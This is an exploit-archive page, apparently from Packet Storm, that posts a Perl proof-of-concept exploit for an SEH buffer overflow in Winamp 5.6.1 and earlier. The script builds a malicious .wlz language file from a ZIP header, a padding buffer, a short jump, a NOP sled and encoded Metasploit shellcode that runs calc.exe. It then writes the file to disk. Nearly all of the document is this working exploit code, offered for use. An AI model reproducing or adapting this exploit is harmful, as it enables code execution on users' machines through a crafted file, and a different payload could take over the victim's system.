exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Winamp 5.6.1 Install Language SEH Overflow

Winamp 5.6.1 Install Language SEH Overflow
Posted Apr 12, 2011
Authored by KedAns-Dz

Winamp versions 5.6.1 and below Install Language SEH overflow exploit.

tags | exploit, overflow
SHA-256 | 3c232be98852803324a77a65c0b794bf06e43d7e91abd9b055dbee63cf79186d

Winamp 5.6.1 Install Language SEH Overflow

Change Mirror Download
#!/usr/bin/perl

# ---------
# Winamp <=5.6.1 Install Language SEH Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
# ---------
# In Winamp 5.6.1 Install New Language with (.wlz) file
# and In File (.wlz) can Inclusion SEH for Installing ...
my $header =
"\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\x2f\x92\x7b\x3d\xd3\x55".
"\x30\x92\x00\x28\x00\x00\x00\x28\x00\x00\x08\x00\x00\x00\x61\x75".
"\x74\x68\x2e\x6c\x6e\x67";
my $jump = "\xeb\x06\x90\x90" ; # short jump
my $junk = "\x41" x 321; # Buffer
my $nops = "\x90" x 51; # Nopsled
# windows/exec - 224 bytes (http://www.metasploit.com)
# EXITFUNC=seh, CMD=calc.exe , Encoder: x86/call4_dword_xor
my $shell =
"\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\x26\x7e\x29\x35\x83\xee\xfc\xe2\xf4\xda\x96\xa0\x35" .
"\x26\x7e\x49\xbc\xc3\x4f\xfb\x51\xad\x2c\x19\xbe\x74\x72" .
"\xa2\x67\x32\xf5\x5b\x1d\x29\xc9\x63\x13\x17\x81\x18\xf5" .
"\x8a\x42\x48\x49\x24\x52\x09\xf4\xe9\x73\x28\xf2\xc4\x8e" .
"\x7b\x62\xad\x2c\x39\xbe\x64\x42\x28\xe5\xad\x3e\x51\xb0" .
"\xe6\x0a\x63\x34\xf6\x2e\xa2\x7d\x3e\xf5\x71\x15\x27\xad" .
"\xca\x09\x6f\xf5\x1d\xbe\x27\xa8\x18\xca\x17\xbe\x85\xf4" .
"\xe9\x73\x28\xf2\x1e\x9e\x5c\xc1\x25\x03\xd1\x0e\x5b\x5a" .
"\x5c\xd7\x7e\xf5\x71\x11\x27\xad\x4f\xbe\x2a\x35\xa2\x6d" .
"\x3a\x7f\xfa\xbe\x22\xf5\x28\xe5\xaf\x3a\x0d\x11\x7d\x25" .
"\x48\x6c\x7c\x2f\xd6\xd5\x7e\x21\x73\xbe\x34\x95\xaf\x68" .
"\x4c\x7f\xa4\xb0\x9f\x7e\x29\x35\x76\x16\x18\xbe\x49\xf9" .
"\xd6\xe0\x9d\x80\x27\x07\xcc\x16\x8f\xa0\x9b\xe3\xd6\xe0" .
"\x1a\x78\x55\x3f\xa6\x85\xc9\x40\x23\xc5\x6e\x26\x54\x11" .
"\x43\x35\x75\x81\xfc\x56\x47\x12\x4a\x1b\x43\x06\x4c\x35";
my $exploit = $header.$jump.$junk.$jump.$shell.$nops;
open(myfile,'>>ar-dz.wlz');
print myfile $exploit;
close (myfile);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close